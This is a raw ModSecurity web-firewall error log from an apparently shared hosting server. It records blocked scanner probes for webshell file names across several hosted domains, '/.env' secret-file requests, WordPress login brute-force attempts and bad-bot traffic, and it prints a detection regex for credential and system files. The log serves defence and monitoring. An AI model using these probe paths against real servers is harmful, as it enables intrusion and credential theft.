[Tue May 26 13:13:07.797132 2026] [security2:error] [pid 496740:tid 496961] [client 108.136.131.13:56001] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wpindex.php"] [unique_id "ahVPC-vOeft4ltnLrH5CqwAAAFs"]
[Tue May 26 13:13:07.797178 2026] [security2:error] [pid 496740:tid 496962] [client 108.136.131.13:56003] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wsanon.php"] [unique_id "ahVPC-vOeft4ltnLrH5CrAAAAFw"]
[Tue May 26 13:13:07.799594 2026] [security2:error] [pid 496740:tid 496972] [client 108.136.131.13:56008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/x.php"] [unique_id "ahVPC-vOeft4ltnLrH5CrgAAAGY"]
[Tue May 26 13:13:07.805368 2026] [security2:error] [pid 496740:tid 496917] [client 108.136.131.13:56007] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wso403.php"] [unique_id "ahVPC-vOeft4ltnLrH5CrwAAAC8"]
[Tue May 26 13:13:07.819361 2026] [security2:error] [pid 496740:tid 496930] [client 108.136.131.13:56006] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wso.php"] [unique_id "ahVPC-vOeft4ltnLrH5CsAAAADw"]
[Tue May 26 13:13:08.243787 2026] [security2:error] [pid 496740:tid 496898] [client 108.136.131.13:56334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/xmrlpc.php"] [unique_id "ahVPDOvOeft4ltnLrH5CwAAAABw"]
[Tue May 26 13:13:08.249491 2026] [security2:error] [pid 496740:tid 496973] [client 108.136.131.13:56336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/xmrlpc.php"] [unique_id "ahVPDOvOeft4ltnLrH5CwQAAAGc"]
[Tue May 26 13:13:08.253527 2026] [security2:error] [pid 496740:tid 496870] [client 108.136.131.13:56318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/xleet-shell.php"] [unique_id "ahVPDOvOeft4ltnLrH5CwgAAAAA"]
[Tue May 26 13:13:08.260065 2026] [security2:error] [pid 496740:tid 496977] [client 108.136.131.13:56326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/xleet.php"] [unique_id "ahVPDOvOeft4ltnLrH5CwwAAAGs"]
[Tue May 26 13:13:08.261550 2026] [security2:error] [pid 496740:tid 496946] [client 108.136.131.13:56327] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/xmlrpc.php"] [unique_id "ahVPDOvOeft4ltnLrH5CxAAAAEw"]
[Tue May 26 13:13:08.685342 2026] [security2:error] [pid 496740:tid 496879] [client 108.136.131.13:56934] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/zero.php"] [unique_id "ahVPDOvOeft4ltnLrH5C1wAAAAk"]
[Tue May 26 13:13:08.685441 2026] [security2:error] [pid 496740:tid 496955] [client 108.136.131.13:56926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/xxx.php"] [unique_id "ahVPDOvOeft4ltnLrH5C1gAAAFU"]
[Tue May 26 13:13:08.686281 2026] [security2:error] [pid 496740:tid 496914] [client 108.136.131.13:56932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/y.php"] [unique_id "ahVPDOvOeft4ltnLrH5C2AAAACw"]
[Tue May 26 13:13:08.694609 2026] [security2:error] [pid 496740:tid 496947] [client 108.136.131.13:56924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/xx.php"] [unique_id "ahVPDOvOeft4ltnLrH5C2QAAAE0"]
[Tue May 26 13:13:08.705165 2026] [security2:error] [pid 496740:tid 496881] [client 108.136.131.13:56933] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/z.php"] [unique_id "ahVPDOvOeft4ltnLrH5C2gAAAAs"]
[Tue May 26 13:13:09.067527 2026] [security2:error] [pid 496740:tid 496902] [client 220.93.109.112:57501] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVPDOvOeft4ltnLrH5C4wAAACA"], referer: https://www.cagmedya.com/mersin-web-tasarim/
[Tue May 26 13:13:09.125264 2026] [security2:error] [pid 496740:tid 496970] [client 108.136.131.13:57421] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/zone.php"] [unique_id "ahVPDevOeft4ltnLrH5C8wAAAGQ"]
[Tue May 26 13:13:09.591711 2026] [security2:error] [pid 496740:tid 496974] [client 85.208.96.211:31624] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-february/day/2024-07-14/"] [unique_id "ahVPDevOeft4ltnLrH5DBwAAAGg"]
[Tue May 26 13:13:09.591919 2026] [security2:error] [pid 496740:tid 496974] [client 85.208.96.211:31624] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-february/day/2024-07-14/"] [unique_id "ahVPDevOeft4ltnLrH5DBwAAAGg"]
[Tue May 26 13:13:09.653935 2026] [security2:error] [pid 496740:tid 496862] [remote 112.196.0.228:38226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.0.196.112.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahVPDevOeft4ltnLrH5DAAAABHk"]
[Tue May 26 13:13:09.939328 2026] [security2:error] [pid 496740:tid 496887] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPDevOeft4ltnLrH5DAwAAABE"]
[Tue May 26 13:13:11.807969 2026] [security2:error] [pid 496740:tid 496893] [client 176.65.139.235:45748] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.pronumbers.com.au"] [uri "/.env"] [unique_id "ahVPD-vOeft4ltnLrH5DbwAAABc"]
[Tue May 26 13:13:11.886676 2026] [security2:error] [pid 496740:tid 496979] [client 176.65.139.232:44690] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "pronumbers.com.au"] [uri "/.env"] [unique_id "ahVPD-vOeft4ltnLrH5DfgAAAG0"]
[Tue May 26 13:13:12.398252 2026] [security2:error] [pid 496740:tid 496904] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPD-vOeft4ltnLrH5DgQAAACI"]
[Tue May 26 13:13:14.439484 2026] [fcgid:warn] [pid 496740:tid 496946] (70014)End of file found: [client 192.235.106.165:12147] mod_fcgid: can't get data from http client
[Tue May 26 13:13:15.148132 2026] [security2:error] [pid 496740:tid 496880] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPEuvOeft4ltnLrH5EBwAAAAo"]
[Tue May 26 13:13:16.124889 2026] [security2:error] [pid 496740:tid 496748] [remote 45.32.67.165:59308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.67.32.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVPE-vOeft4ltnLrH5EMgAAawc"]
[Tue May 26 13:13:17.021704 2026] [security2:error] [pid 496740:tid 496850] [remote 174.138.83.43:45238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 43.83.138.174.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVPFOvOeft4ltnLrH5EXQAAD20"]
[Tue May 26 13:13:17.755826 2026] [security2:error] [pid 496740:tid 496990] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPFevOeft4ltnLrH5EdQAAAHg"]
[Tue May 26 13:13:18.204889 2026] [security2:error] [pid 496740:tid 496979] [client 24.99.17.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPFevOeft4ltnLrH5EjQAAAG0"]
[Tue May 26 13:13:19.412422 2026] [security2:error] [pid 496740:tid 496882] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPF-vOeft4ltnLrH5ExQAAAAw"]
[Tue May 26 13:13:21.906348 2026] [security2:error] [pid 496740:tid 496980] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPGevOeft4ltnLrH5FNgAAAG4"]
[Tue May 26 13:13:23.605177 2026] [security2:error] [pid 496740:tid 496974] [client 20.151.111.128:3332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-plain.php"] [unique_id "ahVPG-vOeft4ltnLrH5FigAAAGg"], referer: www.google.com
[Tue May 26 13:13:23.625801 2026] [security2:error] [pid 496740:tid 496928] [client 20.151.111.128:3456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVPG-vOeft4ltnLrH5FiwAAADo"], referer: www.google.com
[Tue May 26 13:13:24.133032 2026] [security2:error] [pid 496740:tid 496944] [client 20.151.111.128:3494] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVPG-vOeft4ltnLrH5FjQAAAEo"], referer: www.google.com
[Tue May 26 13:13:24.339725 2026] [security2:error] [pid 496740:tid 496888] [client 20.151.111.128:3494] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVPHOvOeft4ltnLrH5FrAAAABI"], referer: www.google.com
[Tue May 26 13:13:24.416321 2026] [security2:error] [pid 496740:tid 496785] [remote 185.177.72.30:61946] ModSecurity: Access denied with code 406 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "61"] [id "390616"] [rev "2"] [msg "Atomicorp.com WAF Rules: POST request must have a Content-Length header"] [severity "WARNING"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahVPHOvOeft4ltnLrH5FsAAAWiw"]
[Tue May 26 13:13:24.620906 2026] [security2:error] [pid 496740:tid 496997] [client 20.151.111.128:3477] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/njpgdhyg.php"] [unique_id "ahVPHOvOeft4ltnLrH5FtwAAAH8"], referer: www.google.com
[Tue May 26 13:13:24.884896 2026] [security2:error] [pid 496740:tid 496979] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPHOvOeft4ltnLrH5FswAAAG0"]
[Tue May 26 13:13:24.914027 2026] [security2:error] [pid 496740:tid 496862] [remote 185.177.72.30:61960] ModSecurity: Access denied with code 406 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "61"] [id "390616"] [rev "2"] [msg "Atomicorp.com WAF Rules: POST request must have a Content-Length header"] [severity "WARNING"] [hostname "samayikprasanga.in"] [uri "/_next"] [unique_id "ahVPHOvOeft4ltnLrH5FvQAAIHk"]
[Tue May 26 13:13:25.411634 2026] [security2:error] [pid 496740:tid 496812] [remote 185.177.72.30:61970] ModSecurity: Access denied with code 406 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "61"] [id "390616"] [rev "2"] [msg "Atomicorp.com WAF Rules: POST request must have a Content-Length header"] [severity "WARNING"] [hostname "samayikprasanga.in"] [uri "/api"] [unique_id "ahVPHevOeft4ltnLrH5FzAAAT0c"]
[Tue May 26 13:13:25.767640 2026] [security2:error] [pid 496740:tid 496980] [client 50.20.123.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPHevOeft4ltnLrH5FywAAAG4"]
[Tue May 26 13:13:25.908085 2026] [security2:error] [pid 496740:tid 496792] [remote 185.177.72.30:61976] ModSecurity: Access denied with code 406 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "61"] [id "390616"] [rev "2"] [msg "Atomicorp.com WAF Rules: POST request must have a Content-Length header"] [severity "WARNING"] [hostname "samayikprasanga.in"] [uri "/api/auth"] [unique_id "ahVPHevOeft4ltnLrH5F2wAAKjM"]
[Tue May 26 13:13:26.422215 2026] [security2:error] [pid 496740:tid 496800] [remote 185.177.72.30:61980] ModSecurity: Access denied with code 406 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "61"] [id "390616"] [rev "2"] [msg "Atomicorp.com WAF Rules: POST request must have a Content-Length header"] [severity "WARNING"] [hostname "samayikprasanga.in"] [uri "/api/auth/callback"] [unique_id "ahVPHuvOeft4ltnLrH5F5QAAcTs"]
[Tue May 26 13:13:26.948748 2026] [security2:error] [pid 496740:tid 496806] [remote 185.177.72.30:61996] ModSecurity: Access denied with code 406 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "61"] [id "390616"] [rev "2"] [msg "Atomicorp.com WAF Rules: POST request must have a Content-Length header"] [severity "WARNING"] [hostname "samayikprasanga.in"] [uri "/api/auth/session"] [unique_id "ahVPHuvOeft4ltnLrH5F8AAAAkE"]
[Tue May 26 13:13:27.103695 2026] [security2:error] [pid 496740:tid 496991] [client 20.151.111.128:3500] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVPH-vOeft4ltnLrH5F9AAAAHk"], referer: www.google.com
[Tue May 26 13:13:27.148422 2026] [security2:error] [pid 496740:tid 496946] [client 20.151.111.128:3458] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-plain.php"] [unique_id "ahVPH-vOeft4ltnLrH5F-QAAAEw"], referer: www.google.com
[Tue May 26 13:13:27.305096 2026] [security2:error] [pid 496740:tid 496873] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPHuvOeft4ltnLrH5F7wAAAAM"]
[Tue May 26 13:13:27.445734 2026] [security2:error] [pid 496740:tid 496864] [remote 185.177.72.30:62002] ModSecurity: Access denied with code 406 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "61"] [id "390616"] [rev "2"] [msg "Atomicorp.com WAF Rules: POST request must have a Content-Length header"] [severity "WARNING"] [hostname "samayikprasanga.in"] [uri "/_rsc"] [unique_id "ahVPH-vOeft4ltnLrH5F_gAARHs"]
[Tue May 26 13:13:27.930902 2026] [security2:error] [pid 496740:tid 496799] [remote 185.177.72.30:62008] ModSecurity: Access denied with code 406 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "61"] [id "390616"] [rev "2"] [msg "Atomicorp.com WAF Rules: POST request must have a Content-Length header"] [severity "WARNING"] [hostname "samayikprasanga.in"] [uri "/__rsc"] [unique_id "ahVPH-vOeft4ltnLrH5GDQAAMTo"]
[Tue May 26 13:13:28.075093 2026] [security2:error] [pid 496740:tid 496967] [client 20.151.111.128:3332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.vcresco.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVPIOvOeft4ltnLrH5GEgAAAGE"]
[Tue May 26 13:13:28.438385 2026] [security2:error] [pid 496740:tid 496803] [remote 185.177.72.30:62014] ModSecurity: Access denied with code 406 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "61"] [id "390616"] [rev "2"] [msg "Atomicorp.com WAF Rules: POST request must have a Content-Length header"] [severity "WARNING"] [hostname "samayikprasanga.in"] [uri "/.action"] [unique_id "ahVPIOvOeft4ltnLrH5GGQAALz4"]
[Tue May 26 13:13:28.943680 2026] [security2:error] [pid 496740:tid 496816] [remote 185.177.72.30:44034] ModSecurity: Access denied with code 406 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "61"] [id "390616"] [rev "2"] [msg "Atomicorp.com WAF Rules: POST request must have a Content-Length header"] [severity "WARNING"] [hostname "samayikprasanga.in"] [uri "/__nextjs_action"] [unique_id "ahVPIOvOeft4ltnLrH5GJAAAVEs"]
[Tue May 26 13:13:29.483334 2026] [security2:error] [pid 496740:tid 496815] [remote 185.177.72.30:44036] ModSecurity: Access denied with code 406 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "61"] [id "390616"] [rev "2"] [msg "Atomicorp.com WAF Rules: POST request must have a Content-Length header"] [severity "WARNING"] [hostname "samayikprasanga.in"] [uri "/_middleware"] [unique_id "ahVPIevOeft4ltnLrH5GNwAARko"]
[Tue May 26 13:13:29.554565 2026] [security2:error] [pid 496740:tid 496989] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPIevOeft4ltnLrH5GKgAAAHc"]
[Tue May 26 13:13:29.938229 2026] [security2:error] [pid 496740:tid 496949] [client 216.244.66.241:37696] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/lienomedullarybfab/faabda1767180.shtml"] [unique_id "ahVPIevOeft4ltnLrH5GRgAAAE8"]
[Tue May 26 13:13:29.938372 2026] [security2:error] [pid 496740:tid 496949] [client 216.244.66.241:37696] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/lienomedullarybfab/faabda1767180.shtml"] [unique_id "ahVPIevOeft4ltnLrH5GRgAAAE8"]
[Tue May 26 13:13:29.986952 2026] [security2:error] [pid 496740:tid 496808] [remote 185.177.72.30:44048] ModSecurity: Access denied with code 406 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "61"] [id "390616"] [rev "2"] [msg "Atomicorp.com WAF Rules: POST request must have a Content-Length header"] [severity "WARNING"] [hostname "samayikprasanga.in"] [uri "/_next/image"] [unique_id "ahVPIevOeft4ltnLrH5GRwAAa0M"]
[Tue May 26 13:13:30.318177 2026] [security2:error] [pid 496740:tid 496933] [client 20.151.111.128:12464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/gnbnvwzt.php"] [unique_id "ahVPIuvOeft4ltnLrH5GVwAAAD8"], referer: www.google.com
[Tue May 26 13:13:30.433263 2026] [security2:error] [pid 496740:tid 496884] [client 20.151.111.128:12448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.vcresco.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVPIuvOeft4ltnLrH5GXAAAAA4"]
